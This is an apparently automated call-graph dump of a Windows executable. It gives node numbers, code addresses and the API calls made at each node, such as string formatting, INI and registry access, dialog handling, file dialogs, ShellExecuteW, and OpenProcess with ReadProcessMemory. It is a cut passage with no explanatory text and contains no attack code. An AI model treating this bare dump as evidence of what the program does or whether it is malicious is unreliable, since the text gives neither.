4837->4840 4841 40af89 wcscat 4838->4841 4842 40af7c wcscat 4838->4842 4839->4840 4845 40af6a wcscat 4840->4845 4850 40adc0 _snwprintf 4840->4850 4843 40afa6 4841->4843 4844 40af99 wcscat 4841->4844 4842->4841 4846 40771d _snwprintf 4843->4846 4847 40afab wcscat 4843->4847 4844->4843 4845->4838 4846->4770 4847->4846 4849 40af43 _snwprintf wcscat 4849->4845 4850->4849 4851->4776 4852->4778 4853->4788 4855 407263 4854->4855 4856 407287 _wcslwr 4855->4856 4856->4815 3614 40a156 3617 409ddc 3614->3617 3618 409de9 3617->3618 3619 409e08 memset 3618->3619 3620 409e3b memset GetPrivateProfileStringW 3618->3620 3630 40512f 3619->3630 3625 4051b8 wcslen 3620->3625 3624 409e7a 3626 4051cc 3625->3626 3627 4051ce 3625->3627 3626->3624 3628 405222 3627->3628 3629 405204 wcstoul 3627->3629 3628->3624 3629->3627 3631 4051a3 WritePrivateProfileStringW 3630->3631 3633 405143 3630->3633 3631->3624 3632 405151 _snwprintf memcpy 3632->3631 3632->3633 3633->3631 3633->3632 4857 40b5d9 4864 402923 memset 4857->4864 4859 40b5e4 memset 4860 40171f memset 4859->4860 4861 40b609 4860->4861 4862 40b23c 2 API calls 4861->4862 4863 40b61d 4862->4863 4864->4859 4865 408adb 4866 408ae8 4865->4866 4867 408b71 4866->4867 4873 408af5 4866->4873 4896 404da9 GetSystemMetrics GetSystemMetrics 4867->4896 4869 408dbf 4870 408b7b 8 API calls 4871 408c43 4870->4871 4872 408c59 ReadProcessMemory 4870->4872 4904 404fe0 memset 4871->4904 4877 408c75 4872->4877 4878 408c88 4872->4878 4873->4869 4874 408b19 EndDialog 4873->4874 4875 408b26 4873->4875 4874->4875 4875->4869 4879 408b30 GetDlgItem SendMessageW SendMessageW SendMessageW 4875->4879 4881 404fe0 5 API calls 4877->4881 4911 404bd3 4878->4911 4879->4869 4881->4878 4884 408c93 4914 409172 4884->4914 4885 408c9a 4926 4090ee 4885->4926 4888 408c98 4889 408caf memset GetCurrentProcessId 4888->4889 4890 408d28 _snwprintf SetDlgItemTextW GetDlgItem SetFocus 4888->4890 4934 4092f0 4889->4934 4890->4869 4893 408ced memcpy 4893->4890 4894 408d0e 4893->4894 4895 408d19 wcscpy 4894->4895 4895->4890 4897 404dd0 4896->4897 4898 404dd4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 4896->4898 4897->4898 4899 404dfa GetWindowRect 4897->4899 4898->4899 4900 404e0f GetParent 4899->4900 4902 404e49 MoveWindow 4899->4902 4901 404e1e GetWindowRect 4900->4901 4900->4902 4901->4902 4902->4870 4905 40500e _snwprintf 4904->4905 4906 405040 4905->4906 4907 405033 wcscat 4905->4907 4908 40505d wcscat 4906->4908 4909 405050 wcscat 4906->4909 4907->4906 4908->4905 4910 405075 4908->4910 4909->4908 4910->4872 4912 404baf GetVersionExW 4911->4912 4913 404bd8 4912->4913 4913->4884 4913->4885 4915 409208 4914->4915 4916 40917f 4914->4916 4915->4888 4917 405436 8 API calls 4916->4917 4918 40918a 4917->4918 4918->4915 4919 409191 GetProcAddress 4918->4919 4920 4091a9 GetProcAddress 4919->4920 4925 4091ed 4919->4925 4922 4091ba GetProcAddress 4920->4922 4920->4925 4921 409201 FreeLibrary 4921->4915 4923 4091cb GetProcAddress 4922->4923 4922->4925 4924 4091dc GetProcAddress 4923->4924 4923->4925 4924->4925 4925->4915 4925->4921 4927 409165 4926->4927 4928 4090f7 GetModuleHandleW 4926->4928 4927->4888 4928->4927 4929 409109 GetProcAddress 4928->4929 4929->4927 4930 409121 GetProcAddress 4929->4930 4930->4927 4931 409132 GetProcAddress 4930->4931 4931->4927 4932 409143 GetProcAddress 4931->4932 4932->4927 4933 409154 GetProcAddress 4932->4933 4933->4927 4935 409300 4934->4935 4936 404bd3 GetVersionExW 4935->4936 4937 40930e 4936->4937 4938 409322 OpenProcess 4937->4938 4944 409433 4937->4944 4939 408ce3 4938->4939 4947 40933d 4938->4947 4939->4890 4939->4893 4940 4094fb CloseHandle 4940->4939 4941 409377 memset memset 4941->4947 4942 40947d memset wcscpy 4943 409510 memcpy 4942->4943 4943->4944 4944->4939 4944->4940 4944->4942 4945 40920a 14 API calls 4945->4947 4947->4940 4947->4941 4947->4945 4948 40942e 4947->4948 4949 409510 4947->4949 4948->4940 4950 409520 4949->4950 4951 40954f 4949->4951 4950->4951 4952 40952e memcpy 4950->4952 4951->4947 4952->4951 4953 40b65c 4954 40b665 ??3@YAXPAX 4953->4954 4955 40b66c 4953->4955 4954->4955 4956 4070df 4957 4070f4 4956->4957 4958 40715b 4956->4958 4957->4958 4959 407102 memset 4957->4959 4960 407125 4959->4960 4960->4958 4961 407129 _snwprintf SendMessageW 4960->4961 4961->4958 4962 4030e0 4963 4030e9 4962->4963 4967 403107 4962->4967 4968 40304d memset wcscat 4963->4968 4965 4030f2 4966 404923 2 API calls 4965->4966 4965->4967 4966->4967 4969 40585c _wcsicmp 4968->4969 4970 403095 4969->4970 4970->4965 4971 4081e4 4972 4081f1 4971->4972 4973 407343 6 API calls 4972->4973 4974 408205 memset memset memset 4973->4974 4975 408276 4974->4975 4976 40825c _snwprintf 4974->4976 4977 408291 4975->4977 4978 40827e wcscpy 4975->4978 4976->4975 4986 407afd 4977->4986 4978->4977 4982 407343 6 API calls 4983 4082ec 4982->4983 4984 4082fa 4983->4984 4991 407d03 ??2@YAPAXI 4983->4991 4987 40b550 4986->4987 4988 407b0a _snwprintf 4987->4988 4989 407343 6 API calls 4988->4989 4990 407b57 _snwprintf 4989->4990 4990->4982 4992 407d28 4991->4992 4995 407b5d 4992->4995 4996 40b550 4995->4996 4997 407b6a memset memset memset 4996->4997 4998 407be4 4997->4998 4999 407bbb 4997->4999 5001 407c24 _snwprintf 4998->5001 5013 40adc0 _snwprintf 4998->5013 5012 40adc0 _snwprintf 4999->5012 5004 407343 6 API calls 5001->5004 5002 407bca _snwprintf 5002->4998 5008 407c56 5004->5008 5005 407bf9 _snwprintf wcscpy 5005->5001 5006 407cfc ??3@YAXPAX 5006->4984 5007 407c6b memset 5007->5008 5009 407c8a _snwprintf 5007->5009 5008->5006 5008->5007 5010 407cad _snwprintf 5008->5010 5009->5010 5011 407343 6 API calls 5010->5011 5011->5008 5012->5002 5013->5005 5014 40a7e5 5015 40a826 5014->5015 5016 40a7ef 5014->5016 5017 40a80a 5016->5017 5020 406bba 5016->5020 5017->5015 5019 40a81b EndDialog 5017->5019 5019->5015 5021 406c08 5020->5021 5031 406bc7 5020->5031 5021->5031 5032 40331d SendMessageW 5021->5032 5024 406cc3 5024->5017 5025 406c5a 5026 406c85 5025->5026 5033 403331 SendMessageW 5025->5033 5034 40331d SendMessageW 5026->5034 5029 406c9f 5035 403331 SendMessageW 5029->5035 5036 406b82 5031->5036 5032->5025 5033->5025 5034->5029 5035->5031 5037 406ba0 SendMessageW 5036->5037 5038 406b91 5036->5038 5037->5024 5043 40844d 5038->5043 5042 406b9e 5042->5024 5047 408473 5043->5047 5044 4084d3 5045 408502 5044->5045 5050 4084e5 5044->5050 5046 40851a qsort 5045->5046 5048 406b99 5046->5048 5047->5044 5055 4083dc ??2@YAPAXI 5047->5055 5052 406e57 5048->5052 5051 4083dc 5 API calls 5050->5051 5051->5048 5060 406842 5052->5060 5056 4083f8 5055->5056 5057 40843f ??3@YAXPAX 5055->5057 5058 40840c memcpy memcpy memcpy 5056->5058 5057->5044 5058->5058 5059 40843e 5058->5059 5059->5057 5063 4033e7 SendMessageW 5060->5063 5062 40684d SendMessageW 5062->5042 5063->5062 5064 40b6e7 5065 40b6f0 FreeLibrary 5064->5065 5066 40b6f7 5064->5066 5065->5066 5067 40a9ea 5068 40aa06 5067->5068 5069 4095fd 49 API calls 5068->5069 5070 40aa0c 5069->5070 5081 4097a9 5070->5081 5072 40aabf 5073 4095da 2 API calls 5072->5073 5075 40aac8 5073->5075 5074 40aa2f GetCurrentProcessId 5079 40aa16 5074->5079 5077 404923 2 API calls 5077->5079 5078 409a94 23 API calls 5078->5079 5079->5072 5079->5074 5079->5077 5079->5078 5094 40a909 5079->5094 5097 40715e 5079->5097 5082 4097b6 5081->5082 5107 408e31 5082->5107 5086 408e31 13 API calls 5088 409815 5086->5088 5087 4098e9 ??3@YAXPAX 5087->5079 5088->5087 5089 404923 2 API calls 5088->5089 5090 404923 2 API calls 5088->5090 5091 40987d memcpy 5089->5091 5092 4098b6 memcpy 5090->5092 5091->5088 5093 4099ed 4 API calls 5092->5093 5093->5088 5110 404fa4 memset 5094->5110 5096 40a927 5096->5079 5099 4071a4 5097->5099 5105 407170 5097->5105 5098 4071cd 5100 4071f1 free 5098->5100 5101 407215 5098->5101 5099->5098 5102 4071fa memcpy 5099->5102 5103 407227 5100->5103 5104 404951 3 API calls 5101->5104 5102->5105 5106 407231 memcpy 5103->5106 5104->5103 5105->5079 5106->5105 5108 408f29 ??2@YAPAXI memset 5107->5108 5109 408e3e 13 API calls 5107->5109 5108->5086 5109->5108 5110->5096 5111 4041eb 5112 40420a memset DragQueryFileW DragFinish 5111->5112 5120 404264 5111->5120 5114 40424d 5112->5114 5113 40427b BeginDeferWindowPos 5150 402e22 GetDlgItem GetClientRect 5113->5150 5117 404923 2 API calls 5114->5117 5115 4043ba 5123 4043c8 5115->5123 5154 402ec8 6 API calls 5115->5154 5117->5120 5120->5113 5120->5115 5121 402e22 3 API calls 5122 4042aa 5121->5122 5124 402e22 3 API calls 5122->5124 5125 4042bd 5124->5125 5126 402e22 3 API calls 5125->5126 5127 4042d0 5126->5127 5128 402e22 3 API calls 5127->5128 5129 4042e3 5128->5129 5130 402e22 3 API calls 5129->5130 5131 4042f6 5130->5131 5132 402e22 3 API calls 5131->5132 5133 404309 5132->5133 5134 402e22 3 API calls 5133->5134 5135 40431c 5134->5135 5136 402e22 3 API calls 5135->5136 5137 40432f 5136->5137 5138 402e22 3 API calls 5137->5138 5139 404342 5138->5139 5140 402e22 3 API calls 5139->5140 5141 404355 5140->5141 5142 402e22 3 API calls 5141->5142 5143 404368 5142->5143 5144 402e22 3 API calls 5143->5144 5145 40437b 5144->5145 5146 402e22 3 API calls 5145->5146 5147 40438e 5146->5147 5148 402e22 3 API calls 5147->5148 5149 4043a1 EndDeferWindowPos InvalidateRect 5148->5149 5149->5123 5151 402e56 5150->5151 5152 402ebb 5151->5152 5153 402e6b DeferWindowPos 5151->5153 5152->5121 5153->5152 5154->5123 5158 407ef0 5159 407f7f 5158->5159 5160 407f06 5158->5160 5160->5159 5161 407f37 wcscmp 5160->5161 5162 407f3e _wcsicmp 5160->5162 5164 40488d 3 API calls 5160->5164 5165 404835 wcslen wcslen 5160->5165 5161->5160 5162->5160 5164->5160 5166 404880 5165->5166 5167 40485c 5165->5167 5166->5160 5167->5166 5168 404864 memcmp 5167->5168 5168->5166 5168->5167 5169 403a73 5170 403afa CallWindowProcW 5169->5170 5171 403a7f 5169->5171 5171->5170 5172 403a85 GetKeyState 5171->5172 5186 403a60 GetKeyState 5172->5186 5174 403a98 5175 403aa8 5174->5175 5187 403a60 GetKeyState 5174->5187 5175->5170 5188 403a60 GetKeyState 5175->5188 5178 403ab7 5178->5170 5189 403a60 GetKeyState 5178->5189 5180 403ac6 5180->5170 5190 403a60 GetKeyState 5180->5190 5182 403ad5 5182->5170 5191 403a60 GetKeyState 5182->5191 5184 403ae4 5184->5170 5185 403ae9 SendMessageW 5184->5185 5185->5170 5186->5174 5187->5175 5188->5178 5189->5180 5190->5182 5191->5184 5192 40b477 _XcptFilter 5193 403377 SendMessageW 5194 403396 5193->5194 5196 4033ab 5193->5196 5194->5196 5197 4032f6 SendMessageW 5194->5197 5197->5196 5198 405cf8 5199 405d55 5198->5199 5200 405d08 GetParent GetWindowRect GetClientRect MapWindowPoints SetWindowPos 5198->5200 5201 405d61 5199->5201 5203 404fbb GetWindowLongW SetWindowLongW 5199->5203 5200->5199 5203->5201 5207 40a17b 5210 409d5f 5207->5210 5209 40a19f 5211 409d6c 5210->5211 5212 409d72 5211->5212 5213 409dc4 GetPrivateProfileStringW 5211->5213 5214 409db2 5212->5214 5215 409d76 wcschr 5212->5215 5213->5209 5217 409db6 WritePrivateProfileStringW 5214->5217 5215->5214 5216 409d84 _snwprintf 5215->5216 5216->5217 5217->5209 5218 407d80 memset memset 5219 407dc9 5218->5219 5220 407343 6 API calls 5219->5220 5221 407ddd 5220->5221 5222 407250 2 API calls 5221->5222 5223 407df0 _snwprintf 5222->5223 5224 407343 6 API calls 5223->5224 5225 407e1d 5224->5225 5226 40ac81 memset 5227 40acae 5226->5227 5230 40acc5 5226->5230 5228 40acb1 SHGetPathFromIDListW 5227->5228 5229 40acf6 5227->5229 5228->5229 5228->5230 5230->5229 5231 40aced SendMessageW 5230->5231 5231->5229 5232 408182 5233 4081a2 5232->5233 5234 408193 5232->5234 5235 4081ba 5233->5235 5237 407343 6 API calls 5233->5237 5236 407343 6 API calls 5234->5236 5238 407343 6 API calls 5235->5238 5236->5233 5237->5235 5239 4081d7 5238->5239 5240 408382 5241 408397 5240->5241 5242 4083ac 5241->5242 5244 408301 5241->5244 5246 40830e 5244->5246 5245 408377 5245->5241 5246->5245 5247 40836f _wcsicmp 5246->5247 5247->5245 5248 403c03 5321 403b3c memset memset 5248->5321 5252 403c16 DragAcceptFiles GetDlgItem SetWindowLongW 5336 402ddd GetClientRect GetWindow GetWindow 5252->5336 5256 403cb8 GetDlgItem 5257 40ad85 10 API calls 5256->5257 5258 403cca GetDlgItem 5257->5258 5259 405b81 16 API calls 5258->5259 5260 403ce4 5259->5260 5346 4049d9 SendMessageW SendMessageW 5260->5346 5262 403ceb 5263 405b81 16 API calls 5262->5263 5264 403cf6 5263->5264 5347 4049d9 SendMessageW SendMessageW 5264->5347 5266 403cfd 5267 405b81 16 API calls 5266->5267 5268 403d0f 5267->5268 5348 4049d9 SendMessageW SendMessageW 5268->5348 5270 403d16 5271 405b81 16 API calls 5270->5271 5272 403d24 5271->5272 5349 4049d9 SendMessageW SendMessageW 5272->5349 5274 403d2b 5275 405b81 16 API calls 5274->5275 5276 403d3d 5275->5276 5350 4049d9 SendMessageW SendMessageW 5276->5350 5278 403d44 5279 405b81 16 API calls 5278->5279 5280 403d52 5279->5280 5351 4049d9 SendMessageW SendMessageW 5280->5351 5282 403d59 GetDlgItem 5283 405b81 16 API calls 5282->5283 5284 403d74 5283->5284 5352 4049d9 SendMessageW SendMessageW 5284->5352 5286 403d7b 5287 405b81 16 API calls 5286->5287 5288 403d86 5287->5288 5353 4049d9 SendMessageW SendMessageW 5288->5353 5290 403d8d 5291 405b81 16 API calls 5290->5291 5292 403d9c 5291->5292 5354 4049d9 SendMessageW SendMessageW 5292->5354 5294 403da3 5295 405b81 16 API calls 5294->5295 5296 403dae 5295->5296 5355 4049d9 SendMessageW SendMessageW 5296->5355 5298 403db5 GetDlgItem 5299 403dc9 5298->5299 5300 405b81 16 API calls 5299->5300 5302 403de8 GetDlgItem 5299->5302 5356 4049d9 SendMessageW SendMessageW 5299->5356 5300->5299 5303 403df9 5302->5303 5304 405b81 16 API calls 5303->5304 5306 403e18 GetDlgItem 5303->5306 5357 4049d9 SendMessageW SendMessageW 5303->5357 5304->5303 5307 403e28 5306->5307 5308 405b81 16 API calls 5307->5308 5310 403e47 GetDlgItem 5307->5310 5358 4049d9 SendMessageW SendMessageW 5307->5358 5308->5307 5311 403e57 5310->5311 5312 405b81 16 API calls 5311->5312 5314 403e76 SendDlgItemMessageW 5311->5314 5359 4049d9 SendMessageW SendMessageW 5311->5359 5312->5311 5360 403ec3 5314->5360 5319 402bee 7 API calls 5320 403eb4 5319->5320 5385 404ad9 GetModuleFileNameW 5321->5385 5323 403b87 _snwprintf 5324 404923 2 API calls 5323->5324 5325 403bbe 5324->5325 5326 404923 2 API calls 5325->5326 5327 403bd3 5326->5327 5328 404923 2 API calls 5327->5328 5329 403bea 5328->5329 5386 40467a 5329->5386 5332 403b16 5333 403b25 5332->5333 5334 405b81 16 API calls 5333->5334 5335 403b2b SetDlgItemTextW 5334->5335 5335->5252 5337 402e0e 5336->5337 5396 402d99 GetWindowRect MapWindowPoints 5337->5396 5339 402e13 GetWindow 5339->5337 5340 402e1e 7 API calls 5339->5340 5341 40ad85 5340->5341 5342 405436 8 API calls 5341->5342 5343 40ad93 GetProcAddress 5342->5343 5344 40adb4 FreeLibrary 5343->5344 5345 40ada7 5343->5345 5344->5256 5345->5344 5346->5262 5347->5266 5348->5270 5349->5274 5350->5278 5351->5282 5352->5286 5353->5290 5354->5294 5355->5298 5356->5299 5357->5303 5358->5307 5359->5311 5397 402a89 GetDlgItem EnableWindow 5360->5397 5362 403ed6 5398 402a89 GetDlgItem EnableWindow 5362->5398 5364 403ee8 5399 402a89 GetDlgItem EnableWindow 5364->5399 5366 403f03 5400 402a89 GetDlgItem EnableWindow 5366->5400 5368 403f18 5401 402a89 GetDlgItem EnableWindow 5368->5401 5370 403f3d 5402 402a89 GetDlgItem EnableWindow 5370->5402 5372 403f61 5403 402a89 GetDlgItem EnableWindow 5372->5403 5374 403f85 5404 402a89 GetDlgItem EnableWindow 5374->5404 5376 403f9e 5405 402a89 GetDlgItem EnableWindow 5376->5405 5378 403fb7 5406 402a89 GetDlgItem EnableWindow 5378->5406 5380 403e92 GetDlgItem SetFocus 5381 402d78 5380->5381 5382 402d82 5381->5382 5383 404da9 10 API calls 5382->5383 5384 402d93 5383->5384 5384->5319 5385->5323 5392 4043f8 5386->5392 5389 403bf4 5389->5332 5390 40469b memset _snwprintf RegOpenKeyExW 5390->5389 5391 4046f0 RegCloseKey 5390->5391 5391->5389 5395 409eb3 RegOpenKeyExW 5392->5395 5394 40440f 5394->5389 5394->5390 5395->5394 5396->5339 5397->5362 5398->5364 5399->5366 5400->5368 5401->5370 5402->5372 5403->5374 5404->5376 5405->5378 5406->5380 5407 40b688 5410 401a2f 5407->5410 5411 4055d1 free 5410->5411 5412 401a3d 5411->5412 5413 406f09 5414 406f6f 5413->5414 5415 406f1f 5413->5415 5417 406842 SendMessageW 5414->5417 5416 406f4d SendMessageW 5415->5416 5431 407075 5416->5431 5428 406fa9 5417->5428 5419 406f6a 5420 407042 5420->5419 5422 407058 5420->5422 5425 407075 11 API calls 5420->5425 5422->5419 5457 40684f 5422->5457 5423 40700d 5423->5420 5451 406e8a 5423->5451 5424 406fcb SendMessageW 5424->5428 5425->5422 5428->5423 5428->5424 5435 406ccb 5428->5435 5439 406dea 5428->5439 5445 406d44 5428->5445 5432 407087 5431->5432 5433 406bba 11 API calls 5432->5433 5434 407094 5433->5434 5434->5419 5436 406ce1 5435->5436 5438 406cdc 5435->5438 5437 4031e2 SendMessageW 5436->5437 5437->5438 5438->5428 5440 406e51 5439->5440 5443 406df7 5439->5443 5440->5428 5442 406e22 wcscmp 5442->5443 5443->5440 5443->5442 5460 403421 SendMessageW 5443->5460 5461 4033fb SendMessageW 5443->5461 5446 406d56 5445->5446 5462 4032f6 SendMessageW 5446->5462 5448 406dae 5449 406de1 5448->5449 5463 4032b5 SendMessageW 5448->5463 5449->5428 5452 406e9c 5451->5452 5464 40325c 5452->5464 5454 406ef9 5455 406dea 3 API calls 5454->5455 5456 406f03 5455->5456 5456->5423 5467 4031bc SendMessageW 5457->5467 5459 406866 5459->5419 5460->5443 5461->5443 5462->5448 5463->5449 5465 403283 wcslen 5464->5465 5466 40328d SendMessageW 5464->5466 5465->5466 5466->5454 5467->5459 5468 40b48b 5469 40b497 _exit 5468->5469 5470 40b49e _c_exit 5468->5470 5469->5470 5471 40b4a4 5470->5471 5472 40620e 5473 40621b 5472->5473 5474 406224 5473->5474 5480 40625f 5473->5480 5489 405e8d 5474->5489 5476 40632d 5477 40622f LoadMenuW 5496 40605e 5477->5496 5478 405e8d 2 API calls 5481 406294 CreateDialogParamW 5478->5481 5480->5476 5480->5478 5483 4062b2 GetDesktopWindow CreateDialogParamW 5481->5483 5484 4062c6 memset GetWindowTextW 5481->5484 5483->5484 5485 406300 5484->5485 5486 406315 EnumChildWindows DestroyWindow 5484->5486 5487 405fac 3 API calls 5485->5487 5486->5476 5488 406312 5487->5488 5488->5486 5490 405e9d 5489->5490 5492 405e92 _snwprintf 5489->5492 5490->5492 5493 405ebb 5490->5493 5492->5477 5494 405ed0 wcscpy 5493->5494 5495 405edc 5493->5495 5494->5495 5495->5477 5497 40b550 5496->5497 5498 40606e GetMenuItemCount 5497->5498 5499 406148 DestroyMenu 5498->5499 5500 406088 memset GetMenuItemInfoW 5498->5500 5499->5476 5503 4060d9 5500->5503 5501 4060e0 wcschr 5501->5503 5502 40605e 5 API calls 5502->5503 5503->5499 5503->5500 5503->5501 5503->5502 5504 406025 5 API calls 5503->5504 5504->5503 5511 40a10f WritePrivateProfileStringW 5512 40b590 5513 40b23c 2 API calls 5512->5513 5514 40b59a 5513->5514 5518 401093 5519 401270 5518->5519 5520 4010ab 5518->5520 5521 4012a6 SetDlgItemTextW 5519->5521 5522 40127a GetDlgItem ShowWindow GetDlgItem ShowWindow 5519->5522 5523 401231 5520->5523 5524 4010b2 5520->5524 5525 4012b9 SetWindowTextW SetDlgItemTextW SetDlgItemTextW 5521->5525 5522->5525 5528 401252 EndDialog DeleteObject 5523->5528 5547 401113 5523->5547 5526 4011d3 GetDlgItem 5524->5526 5527 4010bb 5524->5527 5549 40103e 5525->5549 5530 4011e8 SetBkMode SetTextColor GetSysColorBrush 5526->5530 5531 40120e 5526->5531 5532 401151 GetDlgItem ChildWindowFromPoint 5527->5532 5533 4010c6 5527->5533 5528->5519 5530->5547 5538 40121c GetDlgItem 5531->5538 5531->5547 5534 4011a4 5532->5534 5535 401187 GetModuleHandleW LoadCursorW SetCursor 5532->5535 5537 4010ce GetDlgItem ChildWindowFromPoint 5533->5537 5533->5547 5539 4011b2 GetDlgItem ChildWindowFromPoint 5534->5539 5534->5547 5535->5547 5541 401104 5537->5541 5542 40111d 5537->5542 5543 40122f 5538->5543 5538->5547 5545 4011d1 5539->5545 5539->5547 5540 404da9 10 API calls 5540->5547 5548 404f7e ShellExecuteW 5541->5548 5544 40112b GetDlgItem ChildWindowFromPoint 5542->5544 5542->5547 5543->5530 5544->5541 5544->5547 5545->5535 5548->5547 5554 404aeb memset wcscpy 5549->5554 5551 40104d CreateFontIndirectW SendDlgItemMessageW 5552 401090 5551->5552 5553 40107c SendDlgItemMessageW 5551->5553 5552->5540 5553->5552 5554->5551 5555 407294 5556 4072a3 5555->5556 5559 404c96 5556->5559 5560 404cac 5559->5560 5568 404ca5 5559->5568 5569 404c70 modf 5560->5569 5562 404cd7 5570 404c70 modf 5562->5570 5564 404d39 5571 404c70 modf 5564->5571 5566 404d63 5572 404c70 modf 5566->5572 5569->5562 5570->5564 5571->5566 5572->5568 5573 402b16 5576 408dc8 5573->5576 5575 402b24 5577 408dd4 5576->5577 5578 408dd9 memcpy memcpy GetModuleHandleW DialogBoxParamW 5576->5578 5577->5575 5578->5575 5579 40b217 _onexit 5580 40a998 5581 40a9bc 5580->5581 5582 40a99f 5580->5582 5581->5582 5583 40a9c3 CompareFileTime 5581->5583 5583->5582 5587 402b9c 5588 405ce7 GetModuleHandleW 5587->5588 5589 402bb7 CreateDialogParamW 5588->5589 5594 405e0a 5589->5594 5595 405e17 5594->5595 5596 402bc8 5595->5596 5597 405e2e memset 5595->5597 5604 405d6a 5596->5604 5598 405e8d 2 API calls 5597->5598 5599 405e52 5598->5599 5600 405f39 3 API calls 5599->5600 5601 405e63 5600->5601 5602 405e7a EnumChildWindows 5601->5602 5603 405e6a SetWindowTextW 5601->5603 5602->5596 5603->5602 5605 405d76 5604->5605 5606 402bd0 ShowWindow UpdateWindow 5604->5606 5607 405d91 5605->5607 5608 405d89 EnumChildWindows 5605->5608 5609 405d97 EnumChildWindows 5607->5609 5610 405d9f 5607->5610 5608->5607 5609->5610 5612 404fbb GetWindowLongW SetWindowLongW 5610->5612 5612->5606 5613 409f9c 5614 40a03c memset memset memset _snwprintf _snwprintf 5613->5614 5615 409fbc memset memset _snwprintf _snwprintf 5613->5615 5616 40a037 5614->5616 5615->5616 5620 4038a3 5621 4038c3 5620->5621 5622 403a2a 5620->5622 5626 4038df 5621->5626 5627 402caf GetWindowPlacement 5621->5627 5623 403a41 5622->5623 5628 403ec3 2 API calls 5622->5628 5763 402d2e 5623->5763 5629 403ec3 2 API calls 5626->5629 5627->5626 5628->5623 5630 4038e6 5629->5630 5632 40467a 5 API calls 5630->5632 5634 403920 5630->5634 5631 403954 5666 40399e 5631->5666 5693 402923 memset 5631->5693 5633 4038f9 5632->5633 5635 403908 5633->5635 5636 4038fd 5633->5636 5634->5631 5640 40149f 12 API calls 5634->5640 5675 404415 5635->5675 5669 4045ba 5636->5669 5637 4039b8 5644 4039c6 5637->5644 5713 4037dd memset memset 5637->5713 5639 403965 5694 401000 5639->5694 5647 403937 5640->5647 5645 4039d5 5644->5645 5726 4035af 5644->5726 5652 4039e4 5645->5652 5733 40344d memset 5645->5733 5653 4013e1 9 API calls 5647->5653 5648 403904 5654 40467a 5 API calls 5648->5654 5658 403a07 5652->5658 5662 405b81 16 API calls 5652->5662 5659 403946 5653->5659 5655 403913 5654->5655 5660 403b16 17 API calls 5655->5660 5656 401000 wcsncat 5661 40398c 5656->5661 5658->5623 5749 4034f0 5658->5749 5692 4054b9 free free 5659->5692 5660->5634 5698 402b79 5661->5698 5665 4039f4 5662->5665 5744 40acfc SHGetMalloc 5665->5744 5666->5637 5701 4036d5 memset memset 5666->5701 5670 4045c7 5669->5670 5671 4043f8 RegOpenKeyExW 5670->5671 5672 4045d8 5671->5672 5673 4045e0 7 API calls 5672->5673 5674 404675 5672->5674 5673->5674 5674->5648 5676 404422 5675->5676 5677 4043f8 RegOpenKeyExW 5676->5677 5678 404433 5677->5678 5679 4045b3 5678->5679 5680 40443b memset _snwprintf 5678->5680 5679->5648 5767 409ecc RegCreateKeyExW 5680->5767 5682 40448b 5683 4045a8 RegCloseKey 5682->5683 5768 409ef4 wcslen RegSetValueExW 5682->5768 5683->5679 5685 4044aa RegCloseKey memset 5769 404ad9 GetModuleFileNameW 5685->5769 5687 4044e0 5687->5683 5688 4044f1 GetDriveTypeW 5687->5688 5688->5683 5689 404527 memset memset _snwprintf _snwprintf 5688->5689 5770 409f1a 5689->5770 5692->5631 5693->5639 5695 401037 5694->5695 5696 40103b 5695->5696 5697 40100e wcsncat 5695->5697 5696->5656 5697->5695 5699 405ce7 GetModuleHandleW 5698->5699 5700 402b91 DialogBoxParamW 5699->5700 5700->5666 5702 405b81 16 API calls 5701->5702 5703 403734 5702->5703 5704 405b81 16 API calls 5703->5704 5705 403744 5704->5705 5779 405236 memset 5705->5779 5708 405b81 16 API calls 5709 403766 GetSaveFileNameW 5708->5709 5710 4037d9 5709->5710 5711 4037b9 wcscpy 5709->5711 5710->5637 5782 40365e 5711->5782 5714 405b81 16 API calls 5713->5714 5715 40383d 5714->5715 5716 405b81 16 API calls 5715->5716 5717 40384d 5716->5717 5718 405236 6 API calls 5717->5718 5719 403866 5718->5719 5720 405b81 16 API calls 5719->5720 5721 40386f 5720->5721 5792 40507a GetOpenFileNameW 5721->5792 5723 40388c 5724 40389c 5723->5724 5725 40365e 32 API calls 5723->5725 5724->5644 5725->5724 5727 401d40 220 API calls 5726->5727 5728 4035dd 5727->5728 5729 4035eb 5728->5729 5795 4047d2 5728->5795 5731 4035fb FreeLibrary 5729->5731 5732 4035f7 5731->5732 5732->5645 5734 405b81 16 API calls 5733->5734 5735 403490 5734->5735 5736 405b81 16 API calls 5735->5736 5737 4034a0 5736->5737 5738 405236 6 API calls 5737->5738 5739 4034b9 5738->5739 5740 405b81 16 API calls 5739->5740 5741 4034c2 5740->5741 5742 40507a 2 API calls 5741->5742 5743 4034dc 5742->5743 5743->5652 5745 40ad16 SHBrowseForFolderW 5744->5745 5747 40ad6c 5744->5747 5746 40ad4a SHGetPathFromIDListW 5745->5746 5745->5747 5746->5747 5748 40ad5c wcscpy 5746->5748 5747->5658 5748->5747 5750 4034fd 5749->5750 5810 402923 memset 5750->5810 5752 40350b 5811 406670 5752->5811 5755 40a909 memset 5756 40354a 5755->5756 5821 402cd5 5756->5821 5759 403586 5824 4067ac 5759->5824 5760 403569 _ultow 5760->5759 5762 40359d 5762->5622 5764 402d62 5763->5764 5765 402d3b 5763->5765 5765->5764 5766 402d52 EndDialog 5765->5766 5766->5764 5767->5682 5768->5685 5769->5687 5777 409eb3 RegOpenKeyExW 5770->5777 5772 409f35 5773 4045a5 5772->5773 5778 409ef4 wcslen RegSetValueExW 5772->5778 5773->5683 5775 409f4c RegCloseKey 5775->5773 5777->5772 5778->5775 5780 40526f _snwprintf wcslen memcpy wcslen memcpy 5779->5780 5780->5780 5781 40375d 5780->5781 5781->5708 5783 403670 5782->5783 5784 40a0eb 2 API calls 5783->5784 5785 4036a1 5784->5785 5786 40177c 20 API calls 5785->5786 5787 4036b0 5786->5787 5788 403616 9 API calls 5787->5788 5790 4036b9 5788->5790 5789 4036cf 5789->5710 5790->5789 5791 403ec3 2 API calls 5790->5791 5791->5789 5793 4050dd 5792->5793 5794 4050cd wcscpy 5792->5794 5793->5723 5794->5723 5796 4047df 5795->5796 5797 4047e6 GetLastError 5796->5797 5798 4047ee 5796->5798 5797->5798 5801 404706 5798->5801 5802 404723 LoadLibraryExW 5801->5802 5803 40473a FormatMessageW 5801->5803 5802->5803 5806 404735 5802->5806 5804 404753 wcslen 5803->5804 5805 404778 wcscpy 5803->5805 5807 404760 wcscpy 5804->5807 5808 40476d LocalFree 5804->5808 5809 404787 _snwprintf MessageBoxW 5805->5809 5806->5803 5807->5808 5808->5809 5809->5729 5810->5752 5840 404fa4 memset 5811->5840 5813 40668b 